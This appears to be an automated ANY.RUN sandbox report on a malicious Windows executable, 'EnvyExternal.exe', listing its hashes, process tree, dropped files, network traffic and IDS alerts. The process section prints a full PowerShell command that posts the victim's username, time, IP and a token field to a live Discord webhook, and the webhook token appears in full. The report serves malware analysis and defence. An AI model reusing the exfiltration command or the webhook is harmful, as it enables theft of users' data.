File name: EnvyExternal.exe

Full analysis: https://app.any.run/tasks/7c919e41-3d61-4106-b710-6f97223b2228
Verdict: Malicious activity
Analysis date: November 23, 2024, 19:27:34
OS: Windows 11 Professional (build: 22000, 64 bit)
Tags: evasion, discord, ims-api, generic
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (console) Intel 80386, for MS Windows, 5 sections
MD5: 74085E676FB6C08FA0437BA5CDD046CA
SHA1: 6CD3C7951D08AEC6C7BA8EA12E0FFDAA4FCF15AC
SHA256: FC8F4A8D60EC80B1FADB027978E74C7B5D1645D09D646CABA48700D742392343
SSDEEP: 3072:3CYa+0Nu6vQAkQ5S7JmyxCbBKhiTbMKxs:EQLi8NiTb9xs

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Executing commands from a ".bat" file

      • EnvyExternal.exe (PID: 912)
    • Application launched itself

      • cmd.exe (PID: 1096)
    • Starts CMD.EXE for commands execution

      • EnvyExternal.exe (PID: 912)
      • cmd.exe (PID: 1096)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 1096)
    • Reads the Internet Settings

      • powershell.exe (PID: 5700)
    • Potential Corporate Privacy Violation

      • curl.exe (PID: 1380)
    • Possible usage of Discord/Telegram API has been detected (YARA)

      • EnvyExternal.exe (PID: 912)
      • cmd.exe (PID: 1096)
    • Checks for external IP

      • curl.exe (PID: 1380)
  • INFO

    • Checks supported languages

      • EnvyExternal.exe (PID: 912)
      • curl.exe (PID: 1380)
    • Create files in a temporary directory

      • EnvyExternal.exe (PID: 912)
    • Reads the computer name

      • curl.exe (PID: 1380)
    • Disables trace logs

      • powershell.exe (PID: 5700)
    • Checks proxy server information

      • powershell.exe (PID: 5700)
    • Attempting to use instant messaging service

      • powershell.exe (PID: 5700)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 5700)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

ims-api

(PID) Process (912) EnvyExternal.exe
Discord-Webhook-Tokens (1): 1309955999985303634/sOOrkQMIa8bOLIW3gbjVkBDhXV-QdgIi8U2GsRcfrI7YiRnQFP-l03EqKXGm9koQXTUQ
Discord-Info-Links: Get Webhook Info: https://discord.com/api/webhooks/1309955999985303634/sOOrkQMIa8bOLIW3gbjVkBDhXV-QdgIi8U2GsRcfrI7YiRnQFP-l03EqKXGm9koQXTUQ

(PID) Process (1096) cmd.exe
Discord-Webhook-Tokens (1): 1309955999985303634/sOOrkQMIa8bOLIW3gbjVkBDhXV-QdgIi8U2GsRcfrI7YiRnQFP-l03EqKXGm9koQXTUQ
Discord-Info-Links: Get Webhook Info: https://discord.com/api/webhooks/1309955999985303634/sOOrkQMIa8bOLIW3gbjVkBDhXV-QdgIi8U2GsRcfrI7YiRnQFP-l03EqKXGm9koQXTUQ
No Malware configuration.

TRiD

.exe | Win32 Executable MS Visual C++ (generic) (41)
.exe | Win64 Executable (generic) (36.3)
.dll | Win32 Dynamic Link Library (generic) (8.6)
.exe | Win32 Executable (generic) (5.9)
.exe | Win16/32 Executable Delphi generic (2.7)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2019:07:30 08:52:45+00:00
ImageFileCharacteristics: No relocs, Executable, No line numbers, No symbols, 32-bit
PEType: PE32
LinkerVersion: 2.5
CodeSize: 70656
InitializedDataSize: 20480
UninitializedDataSize: -
EntryPoint: 0x1000
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows command line
Total processes: 117
Monitored processes: 6
Malicious processes: 3
Suspicious processes: 1

Behavior graph

Processes in the graph: envyexternal.exe, conhost.exe, cmd.exe, cmd.exe, curl.exe, powershell.exe (interactive process details are in the full report).

Process information

PID 912
CMD: "C:\Users\admin\Desktop\EnvyExternal.exe"
Path: C:\Users\admin\Desktop\EnvyExternal.exe
Parent process: explorer.exe
User: admin
Integrity Level: MEDIUM
Modules (images): c:\users\admin\desktop\envyexternal.exe, c:\windows\system32\ntdll.dll, c:\windows\syswow64\ntdll.dll, c:\windows\system32\wow64.dll, c:\windows\system32\wow64base.dll, c:\windows\system32\wow64win.dll, c:\windows\system32\wow64con.dll, c:\windows\system32\wow64cpu.dll, c:\windows\syswow64\kernel32.dll, c:\windows\syswow64\kernelbase.dll
PID 1096
CMD: "C:\Windows\sysnative\cmd" /c "C:\Users\admin\AppData\Local\Temp\F404.tmp\F405.tmp\F406.bat C:\Users\admin\Desktop\EnvyExternal.exe"
Path: C:\Windows\System32\cmd.exe
Parent process: EnvyExternal.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Version: 10.0.22000.1 (WinBuild.160101.0800)
Modules (images): c:\windows\system32\cmd.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\apphelp.dll, c:\windows\system32\msvcrt.dll, c:\windows\system32\combase.dll, c:\windows\system32\ucrtbase.dll, c:\windows\system32\rpcrt4.dll, c:\windows\system32\cmdext.dll
PID 1380
CMD: curl -s https://api.ipify.org
Path: C:\Windows\System32\curl.exe
Parent process: cmd.exe
User: admin
Company: curl, https://curl.se/
Integrity Level: MEDIUM
Description: The curl executable
Exit code: 35
Version: 7.83.1
Modules (images): c:\windows\system32\curl.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\apphelp.dll, c:\windows\system32\ws2_32.dll, c:\windows\system32\rpcrt4.dll, c:\windows\system32\advapi32.dll, c:\windows\system32\msvcrt.dll, c:\windows\system32\sechost.dll

PID 1564
CMD: C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org
Path: C:\Windows\System32\cmd.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 35
Version: 10.0.22000.1 (WinBuild.160101.0800)
Modules (images): c:\windows\system32\cmd.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\apphelp.dll, c:\windows\system32\msvcrt.dll, c:\windows\system32\combase.dll, c:\windows\system32\ucrtbase.dll, c:\windows\system32\rpcrt4.dll, c:\windows\system32\sechost.dll

PID 5092
CMD: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: EnvyExternal.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Version: 10.0.22000.1 (WinBuild.160101.0800)
Modules (images): c:\windows\system32\conhost.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\msvcp_win.dll, c:\windows\system32\ucrtbase.dll, c:\windows\system32\shcore.dll, c:\windows\system32\advapi32.dll, c:\windows\system32\msvcrt.dll, c:\windows\system32\sechost.dll

PID 5700
CMD: powershell -Command "$uri='https://discord.com/api/webhooks/1309955999985303634/sOOrkQMIa8bOLIW3gbjVkBDhXV-QdgIi8U2GsRcfrI7YiRnQFP-l03EqKXGm9koQXTUQ'; $json=@{content='Time: 19-27-42.83 - - Desktop User: admin - - IP: - - Token: Token-'} | ConvertTo-Json -Depth 1; Invoke-RestMethod -Uri $uri -Method Post -ContentType 'application/json' -Body $json"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 1
Version: 10.0.22000.1 (WinBuild.160101.0800)
Modules (images): c:\windows\system32\windowspowershell\v1.0\powershell.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\apphelp.dll, c:\windows\system32\msvcrt.dll, c:\windows\system32\oleaut32.dll, c:\windows\system32\msvcp_win.dll, c:\windows\system32\ucrtbase.dll, c:\windows\system32\combase.dll
Total events: 4 989
Read events: 4 989
Write events: 0
Delete events: 0

Modification events: No data

Executable files: 0
Suspicious files: 1
Text files: 4
Unknown types: 0

Dropped files

PID | Process | Filename | Type | MD5 | SHA256
5700 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ivs3et0q.zbl.psm1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5700 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_obw30f4b.vpb.ps1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5700 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | text | 84FB158ACA05199E1E8B0FA886ABD026 | F72863F13D67A92CD55F718E0CB78FFB6407045E196C07B96A810260B646F29E
912 | EnvyExternal.exe | C:\Users\admin\AppData\Local\Temp\F404.tmp\F405.tmp\F406.bat | text | 0F6F09C7B945EF6E2B8B70C1D920DCD7 | 86C73BCD39D4E65D7A849FE486242C718D7AA4AB9DD86FEB9691D0788CBFF9D2
5700 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | 112C732C504273944C200FD62FC34480 | 48961C30063FE68991805F9B0B49072EA683AF1A7872158BBCBA34DFE7BC6BD3
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 20
TCP/UDP connections: 30
DNS requests: 35
Threats: 6

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Reputation
752 | lsass.exe | GET | 304 | 23.53.40.49:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?f484045c209bb483 | unknown | whitelisted
6656 | MoUsoCoreWorker.exe | GET | 304 | 23.53.40.49:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?c1c458885a3ece16 | unknown | whitelisted
1296 | svchost.exe | GET | 200 | 23.55.161.193:80 | http://www.msftconnecttest.com/connecttest.txt | unknown | whitelisted
1776 | firefox.exe | POST | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/ | unknown | whitelisted
1776 | firefox.exe | POST | 200 | 95.101.74.216:80 | http://r10.o.lencr.org/ | unknown | whitelisted
1776 | firefox.exe | POST | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/ | unknown | whitelisted
1776 | firefox.exe | POST | 200 | 95.101.74.200:80 | http://r10.o.lencr.org/ | unknown | whitelisted
- | - | HEAD | 200 | 23.210.18.164:443 | https://fs.microsoft.com/fs/windows/config.json | unknown | -
2860 | svchost.exe | GET | 304 | 217.20.57.40:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?934a2adae5bf7775 | unknown | whitelisted
2860 | svchost.exe | GET | 200 | 217.20.57.40:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/pinrulesstl.cab?d427199d7579a766 | unknown | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
5552 | svchost.exe | 239.255.255.250:1900 | - | - | - | whitelisted
6652 | rundll32.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
- | - | 192.168.100.255:137 | - | - | - | whitelisted
3432 | OfficeC2RClient.exe | 52.109.89.18:443 | officeclient.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
- | - | 52.109.89.18:443 | officeclient.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
1776 | firefox.exe | 34.149.100.209:443 | firefox.settings.services.mozilla.com | GOOGLE | US | whitelisted
1776 | firefox.exe | 34.120.208.123:443 | incoming.telemetry.mozilla.org | GOOGLE-CLOUD-PLATFORM | US | whitelisted
1296 | svchost.exe | 23.55.161.193:80 | - | Akamai International B.V. | DE | unknown
1380 | curl.exe | 104.26.13.205:443 | api.ipify.org | CLOUDFLARENET | US | shared
752 | lsass.exe | 23.53.40.49:80 | ctldl.windowsupdate.com | Akamai International B.V. | DE | whitelisted

DNS requests

Domain | IP | Reputation
settings-win.data.microsoft.com | 40.127.240.158 | whitelisted
officeclient.microsoft.com | 52.109.89.18 | whitelisted
firefox.settings.services.mozilla.com | 34.149.100.209 | whitelisted
incoming.telemetry.mozilla.org | 34.120.208.123 | whitelisted
prod.remote-settings.prod.webservices.mozgcp.net | 34.149.100.209 | whitelisted
telemetry-incoming.r53-2.services.mozilla.com | 34.120.208.123 | whitelisted
google.com | 142.250.74.206 | whitelisted
api.ipify.org | 104.26.13.205, 172.67.74.152, 104.26.12.205 | shared
ctldl.windowsupdate.com | 23.53.40.49, 23.53.40.35, 217.20.57.40, 217.20.57.43, 84.201.210.39, 84.201.210.22, 84.201.210.23, 84.201.210.38, 217.20.57.25 | whitelisted
ecs.office.com | 52.113.194.132 | whitelisted

Threats

PID | Process | Class | Message
1296 | svchost.exe | Misc activity | ET INFO Microsoft Connection Test
1656 | svchost.exe | Misc activity | ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup
1380 | curl.exe | Misc activity | ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI
1380 | curl.exe | Potential Corporate Privacy Violation | ET POLICY Possible IP Check api.ipify.org
1656 | svchost.exe | Misc activity | ET INFO Observed Discord Domain in DNS Lookup (discord .com)
5700 | powershell.exe | Misc activity | ET INFO Observed Discord Domain (discord .com in TLS SNI)
No debug info